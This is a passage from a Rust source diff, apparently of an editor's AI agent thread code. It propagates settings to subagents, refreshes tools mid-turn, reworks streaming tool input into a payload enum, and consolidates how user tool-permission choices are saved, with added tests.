self.messages.is_empty() && self.title.is_none() } + pub fn draft_prompt(&self) -> Option<&[acp::ContentBlock]> { + self.draft_prompt.as_deref() + } + + pub fn set_draft_prompt(&mut self, prompt: Option>) { + self.draft_prompt = prompt; + } + + pub fn ui_scroll_position(&self) -> Option { + self.ui_scroll_position + } + + pub fn set_ui_scroll_position(&mut self, position: Option) { + self.ui_scroll_position = position; + } + pub fn model(&self) -> Option<&Arc> { self.model.as_ref() } pub fn set_model(&mut self, model: Arc, cx: &mut Context) { let old_usage = self.latest_token_usage(); - self.model = Some(model); + self.model = Some(model.clone()); let new_caps = Self::prompt_capabilities(self.model.as_deref()); let new_usage = self.latest_token_usage(); if old_usage != new_usage { cx.emit(TokenUsageUpdated(new_usage)); } 
self.prompt_capabilities_tx.send(new_caps).log_err(); + + for subagent in &self.running_subagents { + subagent + .update(cx, |thread, cx| thread.set_model(model.clone(), cx)) + .ok(); + } + cx.notify() } @@ -1293,7 +1420,15 @@ impl Thread { model: Option>, cx: &mut Context, ) { - self.summarization_model = model; + self.summarization_model = model.clone(); + + for subagent in &self.running_subagents { + subagent + .update(cx, |thread, cx| { + thread.set_summarization_model(model.clone(), cx) + }) + .ok(); + } cx.notify() } @@ -1303,6 +1438,12 @@ impl Thread { pub fn set_thinking_enabled(&mut self, enabled: bool, cx: &mut Context) { self.thinking_enabled = enabled; + + for subagent in &self.running_subagents { + subagent + .update(cx, |thread, cx| thread.set_thinking_enabled(enabled, cx)) + .ok(); + } cx.notify(); } @@ -1311,7 +1452,15 @@ impl Thread { } pub fn set_thinking_effort(&mut self, effort: Option, cx: &mut Context) { - self.thinking_effort = effort; + self.thinking_effort = effort.clone(); + + for subagent in &self.running_subagents { + subagent + .update(cx, |thread, cx| { + thread.set_thinking_effort(effort.clone(), cx) + }) + .ok(); + } cx.notify(); } @@ -1321,10 +1470,21 @@ impl Thread { pub fn set_speed(&mut self, speed: Speed, cx: &mut Context) { self.speed = Some(speed); + + for subagent in &self.running_subagents { + subagent + .update(cx, |thread, cx| thread.set_speed(speed, cx)) + .ok(); + } cx.notify(); } - pub fn last_message(&self) -> Option { + pub fn last_message(&self) -> Option<&Message> { + self.messages.last() + } + + #[cfg(any(test, feature = "test-support"))] + pub fn last_received_or_pending_message(&self) -> Option { if let Some(message) = self.pending_message.clone() { Some(Message::Agent(message)) } else { @@ -1337,6 +1497,9 @@ impl Thread { environment: Rc, cx: &mut Context, ) { + // Only update the agent location for the root thread, not for subagents. 
+ let update_agent_location = self.parent_thread_id().is_none(); + let language_registry = self.project.read(cx).languages().clone(); self.add_tool(CopyPathTool::new(self.project.clone())); self.add_tool(CreateDirectoryTool::new(self.project.clone())); @@ -1354,6 +1517,7 @@ impl Thread { self.add_tool(StreamingEditFileTool::new( self.project.clone(), cx.weak_entity(), + self.action_log.clone(), language_registry, )); self.add_tool(FetchTool::new(self.project.read(cx).client().http_client())); @@ -1363,17 +1527,20 @@ impl Thread { self.add_tool(MovePathTool::new(self.project.clone())); self.add_tool(NowTool); self.add_tool(OpenTool::new(self.project.clone())); + if cx.has_flag::() { + self.add_tool(UpdatePlanTool); + } self.add_tool(ReadFileTool::new( - cx.weak_entity(), self.project.clone(), self.action_log.clone(), + update_agent_location, )); self.add_tool(SaveFileTool::new(self.project.clone())); self.add_tool(RestoreFileFromDiskTool::new(self.project.clone())); self.add_tool(TerminalTool::new(self.project.clone(), environment.clone())); self.add_tool(WebSearchTool); - if cx.has_flag::() && self.depth() < MAX_SUBAGENT_DEPTH { + if self.depth() < MAX_SUBAGENT_DEPTH { self.add_tool(SpawnAgentTool::new(environment)); } } @@ -1387,6 +1554,7 @@ impl Thread { self.tools.insert(T::NAME.into(), tool.erase()); } + #[cfg(any(test, feature = "test-support"))] pub fn remove_tool(&mut self, name: &str) -> bool { self.tools.remove(name).is_some() } @@ -1400,12 +1568,18 @@ impl Thread { return; } - self.profile_id = profile_id; + self.profile_id = profile_id.clone(); // Swap to the profile's preferred model when available. 
if let Some(model) = Self::resolve_profile_model(&self.profile_id, cx) { self.set_model(model, cx); } + + for subagent in &self.running_subagents { + subagent + .update(cx, |thread, cx| thread.set_profile(profile_id.clone(), cx)) + .ok(); + } } pub fn cancel(&mut self, cx: &mut Context) -> Task<()> { @@ -1626,14 +1800,6 @@ impl Thread { cx.notify(); } - #[cfg(feature = "eval")] - pub fn proceed( - &mut self, - cx: &mut Context, - ) -> Result>> { - self.run_turn(cx) - } - fn run_turn( &mut self, cx: &mut Context, @@ -1644,11 +1810,6 @@ impl Thread { self.flush_pending_message(cx); self.cancel(cx).detach(); - let model = self.model.clone().context("No language model configured")?; - let profile = AgentSettings::get_global(cx) - .profiles - .get(&self.profile_id) - .context("Profile not found")?; let (events_tx, events_rx) = mpsc::unbounded::>(); let event_stream = ThreadEventStream(events_tx); let message_ix = self.messages.len().saturating_sub(1); @@ -1656,20 +1817,15 @@ impl Thread { let (cancellation_tx, mut cancellation_rx) = watch::channel(false); self.running_turn = Some(RunningTurn { event_stream: event_stream.clone(), - tools: self.enabled_tools(profile, &model, cx), + tools: self.enabled_tools(cx), cancellation_tx, streaming_tool_inputs: HashMap::default(), _task: cx.spawn(async move |this, cx| { log::debug!("Starting agent turn execution"); - let turn_result = Self::run_turn_internal( - &this, - model, - &event_stream, - cancellation_rx.clone(), - cx, - ) - .await; + let turn_result = + Self::run_turn_internal(&this, &event_stream, cancellation_rx.clone(), cx) + .await; // Check if we were cancelled - if so, cancel() already took running_turn // and we shouldn't touch it (it might be a NEW turn now) @@ -1711,7 +1867,6 @@ impl Thread { async fn run_turn_internal( this: &WeakEntity, - model: Arc, event_stream: &ThreadEventStream, mut cancellation_rx: watch::Receiver, cx: &mut AsyncApp, @@ -1719,12 +1874,22 @@ impl Thread { let mut attempt = 0; let mut intent 
= CompletionIntent::UserPrompt; loop { - let request = - this.update(cx, |this, cx| this.build_completion_request(intent, cx))??; + // Re-read the model and refresh tools on each iteration so that + // mid-turn changes (e.g. the user switches model, toggles tools, + // or changes profile) take effect between tool-call rounds. + let (model, request) = this.update(cx, |this, cx| { + let model = this.model.clone().context("No language model configured")?; + this.refresh_turn_tools(cx); + let request = this.build_completion_request(intent, cx)?; + anyhow::Ok((model, request)) + })??; telemetry::event!( "Agent Thread Completion", thread_id = this.read_with(cx, |this, _| this.id.to_string())?, + parent_thread_id = this.read_with(cx, |this, _| this + .parent_thread_id() + .map(|id| id.to_string()))?, prompt_id = this.read_with(cx, |this, _| this.prompt_id.to_string())?, model = model.telemetry_id(), model_provider = model.provider_id().to_string(), @@ -1737,12 +1902,37 @@ impl Thread { Ok(events) => (events.fuse(), None), Err(err) => (stream::empty().boxed().fuse(), Some(err)), }; - let mut tool_results = FuturesUnordered::new(); + let mut tool_results: FuturesUnordered> = + FuturesUnordered::new(); + let mut early_tool_results: Vec = Vec::new(); let mut cancelled = false; loop { - // Race between getting the first event and cancellation + // Race between getting the first event, tool completion, and cancellation. let first_event = futures::select! 
{ event = events.next().fuse() => event, + tool_result = futures::StreamExt::select_next_some(&mut tool_results) => { + let is_error = tool_result.is_error; + let is_still_streaming = this + .read_with(cx, |this, _cx| { + this.running_turn + .as_ref() + .and_then(|turn| turn.streaming_tool_inputs.get(&tool_result.tool_use_id)) + .map_or(false, |inputs| !inputs.has_received_final()) + }) + .unwrap_or(false); + + early_tool_results.push(tool_result); + + // Only break if the tool errored and we are still + // streaming the input of the tool. If the tool errored + // but we are no longer streaming its input (i.e. there + // are parallel tool calls) we want to continue + // processing those tool inputs. + if is_error && is_still_streaming { + break; + } + continue; + } _ = cancellation_rx.changed().fuse() => { if *cancellation_rx.borrow() { cancelled = true; @@ -1809,26 +1999,26 @@ impl Thread { // that need their own permits. drop(events); - let end_turn = tool_results.is_empty(); - while let Some(tool_result) = tool_results.next().await { - log::debug!("Tool finished {:?}", tool_result); + // Drop streaming tool input senders that never received their final input. + // This prevents deadlock when the LLM stream ends (e.g. because of an error) + // before sending a tool use with `is_input_complete: true`. 
+ this.update(cx, |this, _cx| { + if let Some(running_turn) = this.running_turn.as_mut() { + if running_turn.streaming_tool_inputs.is_empty() { + return; + } + log::warn!("Dropping partial tool inputs because the stream ended"); + running_turn.streaming_tool_inputs.drain(); + } + })?; - event_stream.update_tool_call_fields( - &tool_result.tool_use_id, - acp::ToolCallUpdateFields::new() - .status(if tool_result.is_error { - acp::ToolCallStatus::Failed - } else { - acp::ToolCallStatus::Completed - }) - .raw_output(tool_result.output.clone()), - None, - ); - this.update(cx, |this, _cx| { - this.pending_message() - .tool_results - .insert(tool_result.tool_use_id.clone(), tool_result); - })?; + let end_turn = tool_results.is_empty() && early_tool_results.is_empty(); + + for tool_result in early_tool_results { + Self::process_tool_result(this, event_stream, cx, tool_result)?; + } + while let Some(tool_result) = tool_results.next().await { + Self::process_tool_result(this, event_stream, cx, tool_result)?; } this.update(cx, |this, cx| { @@ -1851,7 +2041,15 @@ impl Thread { })??; let timer = cx.background_executor().timer(retry.duration); event_stream.send_retry(retry); - timer.await; + futures::select! 
{ + _ = timer.fuse() => {} + _ = cancellation_rx.changed().fuse() => { + if *cancellation_rx.borrow() { + log::debug!("Turn cancelled during retry delay, exiting"); + return Ok(()); + } + } + } this.update(cx, |this, _cx| { if let Some(Message::Agent(message)) = this.messages.last() { if message.tool_results.is_empty() { @@ -1874,6 +2072,33 @@ impl Thread { } } + fn process_tool_result( + this: &WeakEntity, + event_stream: &ThreadEventStream, + cx: &mut AsyncApp, + tool_result: LanguageModelToolResult, + ) -> Result<(), anyhow::Error> { + log::debug!("Tool finished {:?}", tool_result); + + event_stream.update_tool_call_fields( + &tool_result.tool_use_id, + acp::ToolCallUpdateFields::new() + .status(if tool_result.is_error { + acp::ToolCallStatus::Failed + } else { + acp::ToolCallStatus::Completed + }) + .raw_output(tool_result.output.clone()), + None, + ); + this.update(cx, |this, _cx| { + this.pending_message() + .tool_results + .insert(tool_result.tool_use_id.clone(), tool_result) + })?; + Ok(()) + } + fn handle_completion_error( &mut self, error: LanguageModelCompletionError, @@ -1969,20 +2194,21 @@ impl Thread { raw_input, json_parse_error, } => { - return Ok(Some(Task::ready( - self.handle_tool_use_json_parse_error_event( - id, - tool_name, - raw_input, - json_parse_error, - event_stream, - ), - ))); + return Ok(self.handle_tool_use_json_parse_error_event( + id, + tool_name, + raw_input, + json_parse_error, + event_stream, + cancellation_rx, + cx, + )); } UsageUpdate(usage) => { telemetry::event!( "Agent Thread Completion Usage Updated", thread_id = self.id.to_string(), + parent_thread_id = self.parent_thread_id().map(|id| id.to_string()), prompt_id = self.prompt_id.to_string(), model = self.model.as_ref().map(|m| m.telemetry_id()), model_provider = self.model.as_ref().map(|m| m.provider_id().to_string()), @@ -2077,12 +2303,12 @@ impl Thread { if !tool_use.is_input_complete { if tool.supports_input_streaming() { let running_turn = self.running_turn.as_mut()?; 
- if let Some(sender) = running_turn.streaming_tool_inputs.get(&tool_use.id) { + if let Some(sender) = running_turn.streaming_tool_inputs.get_mut(&tool_use.id) { sender.send_partial(tool_use.input); return None; } - let (sender, tool_input) = ToolInputSender::channel(); + let (mut sender, tool_input) = ToolInputSender::channel(); sender.send_partial(tool_use.input); running_turn .streaming_tool_inputs @@ -2104,13 +2330,13 @@ impl Thread { } } - if let Some(sender) = self + if let Some(mut sender) = self .running_turn .as_mut()? .streaming_tool_inputs .remove(&tool_use.id) { - sender.send_final(tool_use.input); + sender.send_full(tool_use.input); return None; } @@ -2183,10 +2409,12 @@ impl Thread { raw_input: Arc, json_parse_error: String, event_stream: &ThreadEventStream, - ) -> LanguageModelToolResult { + cancellation_rx: watch::Receiver, + cx: &mut Context, + ) -> Option> { let tool_use = LanguageModelToolUse { - id: tool_use_id.clone(), - name: tool_name.clone(), + id: tool_use_id, + name: tool_name, raw_input: raw_input.to_string(), input: serde_json::json!({}), is_input_complete: true, @@ -2199,14 +2427,43 @@ impl Thread { event_stream, ); - let tool_output = format!("Error parsing input JSON: {json_parse_error}"); - LanguageModelToolResult { - tool_use_id, - tool_name, - is_error: true, - content: LanguageModelToolResultContent::Text(tool_output.into()), - output: Some(serde_json::Value::String(raw_input.to_string())), + let tool = self.tool(tool_use.name.as_ref()); + + let Some(tool) = tool else { + let content = format!("No tool named {} exists", tool_use.name); + return Some(Task::ready(LanguageModelToolResult { + content: LanguageModelToolResultContent::Text(Arc::from(content)), + tool_use_id: tool_use.id, + tool_name: tool_use.name, + is_error: true, + output: None, + })); + }; + + let error_message = format!("Error parsing input JSON: {json_parse_error}"); + + if tool.supports_input_streaming() + && let Some(mut sender) = self + .running_turn + 
.as_mut()? + .streaming_tool_inputs + .remove(&tool_use.id) + { + sender.send_invalid_json(error_message); + return None; } + + log::debug!("Running tool {}. Received invalid JSON", tool_use.name); + let tool_input = ToolInput::invalid_json(error_message); + Some(self.run_tool( + tool, + tool_input, + tool_use.id, + tool_use.name, + event_stream, + cancellation_rx, + cx, + )) } fn send_or_update_tool_use( @@ -2218,20 +2475,18 @@ impl Thread { ) { // Ensure the last message ends in the current tool use let last_message = self.pending_message(); - let push_new_tool_use = last_message.content.last_mut().is_none_or(|content| { + + let has_tool_use = last_message.content.iter_mut().rev().any(|content| { if let AgentMessageContent::ToolUse(last_tool_use) = content { if last_tool_use.id == tool_use.id { *last_tool_use = tool_use.clone(); - false - } else { - true + return true; } - } else { - true } + false }); - if push_new_tool_use { + if !has_tool_use { event_stream.send_tool_call( &tool_use.id, &tool_use.name, @@ -2254,8 +2509,8 @@ impl Thread { } } - pub fn title(&self) -> SharedString { - self.title.clone().unwrap_or("New Thread".into()) + pub fn title(&self) -> Option { + self.title.clone() } pub fn is_generating_summary(&self) -> bool { @@ -2374,8 +2629,21 @@ impl Thread { anyhow::Ok(()) }; - if generate.await.context("failed to generate title").is_ok() { + if generate + .await + .context("failed to generate thread title") + .log_err() + .is_some() + { _ = this.update(cx, |this, cx| this.set_title(title.into(), cx)); + } else { + // Emit TitleUpdated even on failure so that the propagation + // chain (agent::Thread → NativeAgent → AcpThread) fires and + // clears any provisional title that was set before the turn. 
+ _ = this.update(cx, |_, cx| { + cx.emit(TitleUpdated); + cx.notify(); + }); } _ = this.update(cx, |this, _| this.pending_title_generation = None); })); @@ -2449,6 +2717,13 @@ impl Thread { completion_intent: CompletionIntent, cx: &App, ) -> Result { + let completion_intent = + if self.is_subagent() && completion_intent == CompletionIntent::UserPrompt { + CompletionIntent::Subagent + } else { + completion_intent + }; + let model = self.model().context("No language model configured")?; let tools = if let Some(turn) = self.running_turn.as_ref() { turn.tools @@ -2498,12 +2773,13 @@ impl Thread { Ok(request) } - fn enabled_tools( - &self, - profile: &AgentProfileSettings, - model: &Arc, - cx: &App, - ) -> BTreeMap> { + fn enabled_tools(&self, cx: &App) -> BTreeMap> { + let Some(model) = self.model.as_ref() else { + return BTreeMap::new(); + }; + let Some(profile) = AgentSettings::get_global(cx).profiles.get(&self.profile_id) else { + return BTreeMap::new(); + }; fn truncate(tool_name: &SharedString) -> SharedString { if tool_name.len() > MAX_TOOL_NAME_LENGTH { let mut truncated = tool_name.to_string(); @@ -2514,7 +2790,8 @@ impl Thread { } } - let use_streaming_edit_tool = cx.has_flag::(); + let use_streaming_edit_tool = + cx.has_flag::() && model.supports_streaming_tools(); let mut tools = self .tools @@ -2583,6 +2860,13 @@ impl Thread { tools } + fn refresh_turn_tools(&mut self, cx: &App) { + let tools = self.enabled_tools(cx); + if let Some(turn) = self.running_turn.as_mut() { + turn.tools = tools; + } + } + fn tool(&self, name: &str) -> Option> { self.running_turn.as_ref()?.tools.get(name).cloned() } @@ -2826,7 +3110,8 @@ struct RunningTurn { /// The current event stream for the running turn. Used to report a final /// cancellation event if we cancel the turn. event_stream: ThreadEventStream, - /// The tools that were enabled for this turn. + /// The tools that are enabled for the current iteration of the turn. 
+ /// Refreshed at the start of each iteration via `refresh_turn_tools`. tools: BTreeMap>, /// Sender to signal tool cancellation. When cancel is called, this is /// set to true so all tools can detect user-initiated cancellation. @@ -2859,8 +3144,7 @@ impl EventEmitter for Thread {} /// For streaming tools, partial JSON snapshots arrive via `.recv_partial()` as the LLM streams /// them, followed by the final complete input available through `.recv()`. pub struct ToolInput { - partial_rx: mpsc::UnboundedReceiver, - final_rx: oneshot::Receiver, + rx: mpsc::UnboundedReceiver>, _phantom: PhantomData, } @@ -2872,13 +3156,20 @@ impl ToolInput { } pub fn ready(value: serde_json::Value) -> Self { - let (partial_tx, partial_rx) = mpsc::unbounded(); - drop(partial_tx); - let (final_tx, final_rx) = oneshot::channel(); - final_tx.send(value).ok(); + let (tx, rx) = mpsc::unbounded(); + tx.unbounded_send(ToolInputPayload::Full(value)).ok(); + Self { + rx, + _phantom: PhantomData, + } + } + + pub fn invalid_json(error_message: String) -> Self { + let (tx, rx) = mpsc::unbounded(); + tx.unbounded_send(ToolInputPayload::InvalidJson { error_message }) + .ok(); Self { - partial_rx, - final_rx, + rx, _phantom: PhantomData, } } @@ -2892,61 +3183,89 @@ impl ToolInput { /// Wait for the final deserialized input, ignoring all partial updates. /// Non-streaming tools can use this to wait until the whole input is available. 
pub async fn recv(mut self) -> Result { - // Drain any remaining partials - while self.partial_rx.next().await.is_some() {} + while let Ok(value) = self.next().await { + match value { + ToolInputPayload::Full(value) => return Ok(value), + ToolInputPayload::Partial(_) => {} + ToolInputPayload::InvalidJson { error_message } => { + return Err(anyhow!(error_message)); + } + } + } + Err(anyhow!("tool input was not fully received")) + } + + pub async fn next(&mut self) -> Result> { let value = self - .final_rx + .rx + .next() .await - .map_err(|_| anyhow!("tool input sender was dropped before sending final input"))?; - serde_json::from_value(value).map_err(Into::into) - } + .ok_or_else(|| anyhow!("tool input was not fully received"))?; - /// Returns the next partial JSON snapshot, or `None` when input is complete. - /// Once this returns `None`, call `recv()` to get the final input. - pub async fn recv_partial(&mut self) -> Option { - self.partial_rx.next().await + Ok(match value { + ToolInputPayload::Partial(payload) => ToolInputPayload::Partial(payload), + ToolInputPayload::Full(payload) => { + ToolInputPayload::Full(serde_json::from_value(payload)?) 
+ } + ToolInputPayload::InvalidJson { error_message } => { + ToolInputPayload::InvalidJson { error_message } + } + }) } fn cast(self) -> ToolInput { ToolInput { - partial_rx: self.partial_rx, - final_rx: self.final_rx, + rx: self.rx, _phantom: PhantomData, } } } +pub enum ToolInputPayload { + Partial(serde_json::Value), + Full(T), + InvalidJson { error_message: String }, +} + pub struct ToolInputSender { - partial_tx: mpsc::UnboundedSender, - final_tx: Option>, + has_received_final: bool, + tx: mpsc::UnboundedSender>, } impl ToolInputSender { pub(crate) fn channel() -> (Self, ToolInput) { - let (partial_tx, partial_rx) = mpsc::unbounded(); - let (final_tx, final_rx) = oneshot::channel(); + let (tx, rx) = mpsc::unbounded(); let sender = Self { - partial_tx, - final_tx: Some(final_tx), + tx, + has_received_final: false, }; let input = ToolInput { - partial_rx, - final_rx, + rx, _phantom: PhantomData, }; (sender, input) } - pub(crate) fn send_partial(&self, value: serde_json::Value) { - self.partial_tx.unbounded_send(value).ok(); + pub(crate) fn has_received_final(&self) -> bool { + self.has_received_final } - pub(crate) fn send_final(mut self, value: serde_json::Value) { - // Close the partial channel so recv_partial() returns None - self.partial_tx.close_channel(); - if let Some(final_tx) = self.final_tx.take() { - final_tx.send(value).ok(); - } + pub fn send_partial(&mut self, payload: serde_json::Value) { + self.tx + .unbounded_send(ToolInputPayload::Partial(payload)) + .ok(); + } + + pub fn send_full(&mut self, payload: serde_json::Value) { + self.has_received_final = true; + self.tx.unbounded_send(ToolInputPayload::Full(payload)).ok(); + } + + pub fn send_invalid_json(&mut self, error_message: String) { + self.has_received_final = true; + self.tx + .unbounded_send(ToolInputPayload::InvalidJson { error_message }) + .ok(); } } @@ -3218,6 +3537,10 @@ impl ThreadEventStream { .ok(); } + fn send_plan(&self, plan: acp::Plan) { + 
self.0.unbounded_send(Ok(ThreadEvent::Plan(plan))).ok(); + } + fn send_retry(&self, status: acp_thread::RetryStatus) { self.0.unbounded_send(Ok(ThreadEvent::Retry(status))).ok(); } @@ -3353,6 +3676,10 @@ impl ToolCallEventStream { .ok(); } + pub fn update_plan(&self, plan: acp::Plan) { + self.stream.send_plan(plan); + } + /// Authorize a third-party tool (e.g., MCP tool from a context server). /// /// Unlike built-in tools, third-party tools don't support pattern-based permissions. @@ -3406,6 +3733,7 @@ impl ToolCallEventStream { format!("Always for {} MCP tool", display_name), acp::PermissionOptionKind::RejectAlways, ), + sub_patterns: vec![], }, acp_thread::PermissionOptionChoice { allow: acp::PermissionOption::new( @@ -3418,6 +3746,7 @@ impl ToolCallEventStream { "Only this time", acp::PermissionOptionKind::RejectOnce, ), + sub_patterns: vec![], }, ]), response: response_tx, @@ -3433,40 +3762,13 @@ impl ToolCallEventStream { let fs = self.fs.clone(); cx.spawn(async move |cx| { - let response_str = response_rx.await?.0.to_string(); - - if response_str == format!("always_allow_mcp:{}", tool_id) { - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool_id, ToolPermissionMode::Allow); - }); - }); - } - return Ok(()); - } - if response_str == format!("always_deny_mcp:{}", tool_id) { - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool_id, ToolPermissionMode::Deny); - }); - }); - } - return Err(anyhow!("Permission to run tool denied by user")); - } - - if response_str == "allow" { - return Ok(()); + let outcome = response_rx.await?; + let is_allow = Self::persist_permission_outcome(&outcome, fs, &cx); + if is_allow { + Ok(()) + } else { + Err(anyhow!("Permission to run tool denied by user")) } - - 
Err(anyhow!("Permission to run tool denied by user")) }) } @@ -3476,8 +3778,6 @@ impl ToolCallEventStream { context: ToolPermissionContext, cx: &mut App, ) -> Task> { - use settings::ToolPermissionMode; - let options = context.build_permission_options(); let (response_tx, response_rx) = oneshot::channel(); @@ -3504,90 +3804,118 @@ impl ToolCallEventStream { let fs = self.fs.clone(); cx.spawn(async move |cx| { - let response_str = response_rx.await?.0.to_string(); - - // Handle "always allow tool" - e.g., "always_allow:terminal" - if let Some(tool) = response_str.strip_prefix("always_allow:") { - if let Some(fs) = fs.clone() { - let tool = tool.to_string(); - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool, ToolPermissionMode::Allow); - }); - }); - } - return Ok(()); + let outcome = response_rx.await?; + let is_allow = Self::persist_permission_outcome(&outcome, fs, &cx); + if is_allow { + Ok(()) + } else { + Err(anyhow!("Permission to run tool denied by user")) } + }) + } - // Handle "always deny tool" - e.g., "always_deny:terminal" - if let Some(tool) = response_str.strip_prefix("always_deny:") { - if let Some(fs) = fs.clone() { - let tool = tool.to_string(); - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool, ToolPermissionMode::Deny); - }); - }); - } - return Err(anyhow!("Permission to run tool denied by user")); - } - - // Handle "always allow pattern" - e.g., "always_allow_pattern:mcp:server:tool\n^cargo\s" - if let Some(rest) = response_str.strip_prefix("always_allow_pattern:") { - if let Some((pattern_tool_name, pattern)) = rest.split_once('\n') { - let pattern_tool_name = pattern_tool_name.to_string(); - let pattern = pattern.to_string(); - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - 
.agent - .get_or_insert_default() - .add_tool_allow_pattern(&pattern_tool_name, pattern); - }); - }); - } - } else { - log::error!("Failed to parse always allow pattern: missing newline separator in '{rest}'"); - } - return Ok(()); - } + /// Interprets a `SelectedPermissionOutcome` and persists any settings changes. + /// Returns `true` if the tool call should be allowed, `false` if denied. + fn persist_permission_outcome( + outcome: &acp_thread::SelectedPermissionOutcome, + fs: Option>, + cx: &AsyncApp, + ) -> bool { + let option_id = outcome.option_id.0.as_ref(); + + let always_permission = option_id + .strip_prefix("always_allow:") + .map(|tool| (tool, ToolPermissionMode::Allow)) + .or_else(|| { + option_id + .strip_prefix("always_deny:") + .map(|tool| (tool, ToolPermissionMode::Deny)) + }) + .or_else(|| { + option_id + .strip_prefix("always_allow_mcp:") + .map(|tool| (tool, ToolPermissionMode::Allow)) + }) + .or_else(|| { + option_id + .strip_prefix("always_deny_mcp:") + .map(|tool| (tool, ToolPermissionMode::Deny)) + }); - // Handle "always deny pattern" - e.g., "always_deny_pattern:mcp:server:tool\n^cargo\s" - if let Some(rest) = response_str.strip_prefix("always_deny_pattern:") { - if let Some((pattern_tool_name, pattern)) = rest.split_once('\n') { - let pattern_tool_name = pattern_tool_name.to_string(); - let pattern = pattern.to_string(); - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .add_tool_deny_pattern(&pattern_tool_name, pattern); - }); - }); - } - } else { - log::error!("Failed to parse always deny pattern: missing newline separator in '{rest}'"); - } - return Err(anyhow!("Permission to run tool denied by user")); - } + if let Some((tool, mode)) = always_permission { + let params = outcome.params.as_ref(); + Self::persist_always_permission(tool, mode, params, fs, cx); + return mode == ToolPermissionMode::Allow; + } - // Handle simple "allow" 
(allow once) - if response_str == "allow" { - return Ok(()); - } + // Handle simple "allow" / "deny" (once, no persistence) + if option_id == "allow" || option_id == "deny" { + debug_assert!( + outcome.params.is_none(), + "unexpected params for once-only permission" + ); + return option_id == "allow"; + } - // Handle simple "deny" (deny once) - Err(anyhow!("Permission to run tool denied by user")) - }) + debug_assert!(false, "unexpected permission option_id: {option_id}"); + false + } + + /// Persists an "always allow" or "always deny" permission, using sub_patterns + /// from params when present. + fn persist_always_permission( + tool: &str, + mode: ToolPermissionMode, + params: Option<&acp_thread::SelectedPermissionParams>, + fs: Option>, + cx: &AsyncApp, + ) { + let Some(fs) = fs else { + return; + }; + + match params { + Some(acp_thread::SelectedPermissionParams::Terminal { + patterns: sub_patterns, + }) => { + debug_assert!( + !sub_patterns.is_empty(), + "empty sub_patterns for tool {tool} — callers should pass None instead" + ); + let tool = tool.to_string(); + let sub_patterns = sub_patterns.clone(); + cx.update(|cx| { + update_settings_file(fs, cx, move |settings, _| { + let agent = settings.agent.get_or_insert_default(); + for pattern in sub_patterns { + match mode { + ToolPermissionMode::Allow => { + agent.add_tool_allow_pattern(&tool, pattern); + } + ToolPermissionMode::Deny => { + agent.add_tool_deny_pattern(&tool, pattern); + } + // If there's no matching pattern this will + // default to confirm, so falling through is + // fine here. 
+ ToolPermissionMode::Confirm => (), + } + } + }); + }); + } + None => { + let tool = tool.to_string(); + cx.update(|cx| { + update_settings_file(fs, cx, move |settings, _| { + settings + .agent + .get_or_insert_default() + .set_tool_default_permission(&tool, mode); + }); + }); + } + } } } @@ -3640,6 +3968,15 @@ impl ToolCallEventStreamReceiver { panic!("Expected terminal but got: {:?}", event); } } + + pub async fn expect_plan(&mut self) -> acp::Plan { + let event = self.0.next().await; + if let Some(Ok(ThreadEvent::Plan(plan))) = event { + plan + } else { + panic!("Expected plan but got: {:?}", event); + } + } } #[cfg(any(test, feature = "test-support"))] @@ -3755,6 +4092,7 @@ mod tests { use super::*; use gpui::TestAppContext; use language_model::LanguageModelToolUseId; + use language_model::fake_provider::FakeLanguageModel; use serde_json::json; use std::sync::Arc; @@ -3792,74 +4130,259 @@ mod tests { }) } - #[gpui::test] - async fn test_handle_tool_use_json_parse_error_adds_tool_use_to_content( + fn setup_parent_with_subagents( cx: &mut TestAppContext, - ) { - let (thread, event_stream) = setup_thread_for_test(cx).await; + parent: &Entity, + count: usize, + ) -> Vec> { + cx.update(|cx| { + let mut subagents = Vec::new(); + for _ in 0..count { + let subagent = cx.new(|cx| Thread::new_subagent(parent, cx)); + parent.update(cx, |thread, _cx| { + thread.register_running_subagent(subagent.downgrade()); + }); + subagents.push(subagent); + } + subagents + }) + } + + #[gpui::test] + async fn test_set_model_propagates_to_subagents(cx: &mut TestAppContext) { + let (parent, _event_stream) = setup_thread_for_test(cx).await; + let subagents = setup_parent_with_subagents(cx, &parent, 2); + + let new_model: Arc = Arc::new(FakeLanguageModel::with_id_and_thinking( + "test-provider", + "new-model", + "New Model", + false, + )); cx.update(|cx| { - thread.update(cx, |thread, _cx| { - let tool_use_id = LanguageModelToolUseId::from("test_tool_id"); - let tool_name: Arc = 
Arc::from("test_tool"); - let raw_input: Arc = Arc::from("{invalid json"); - let json_parse_error = "expected value at line 1 column 1".to_string(); - - // Call the function under test - let result = thread.handle_tool_use_json_parse_error_event( - tool_use_id.clone(), - tool_name.clone(), - raw_input.clone(), - json_parse_error, - &event_stream, + parent.update(cx, |thread, cx| { + thread.set_model(new_model, cx); + }); + + for subagent in &subagents { + let subagent_model_id = subagent.read(cx).model().unwrap().id(); + assert_eq!( + subagent_model_id.0.as_ref(), + "new-model", + "Subagent model should match parent model after set_model" ); + } + }); + } - // Verify the result is an error - assert!(result.is_error); - assert_eq!(result.tool_use_id, tool_use_id); - assert_eq!(result.tool_name, tool_name); - assert!(matches!( - result.content, - LanguageModelToolResultContent::Text(_) - )); + #[gpui::test] + async fn test_set_summarization_model_propagates_to_subagents(cx: &mut TestAppContext) { + let (parent, _event_stream) = setup_thread_for_test(cx).await; + let subagents = setup_parent_with_subagents(cx, &parent, 2); + + let summary_model: Arc = + Arc::new(FakeLanguageModel::with_id_and_thinking( + "test-provider", + "summary-model", + "Summary Model", + false, + )); - // Verify the tool use was added to the message content - { - let last_message = thread.pending_message(); - assert_eq!( - last_message.content.len(), - 1, - "Should have one tool_use in content" - ); + cx.update(|cx| { + parent.update(cx, |thread, cx| { + thread.set_summarization_model(Some(summary_model), cx); + }); - match &last_message.content[0] { - AgentMessageContent::ToolUse(tool_use) => { - 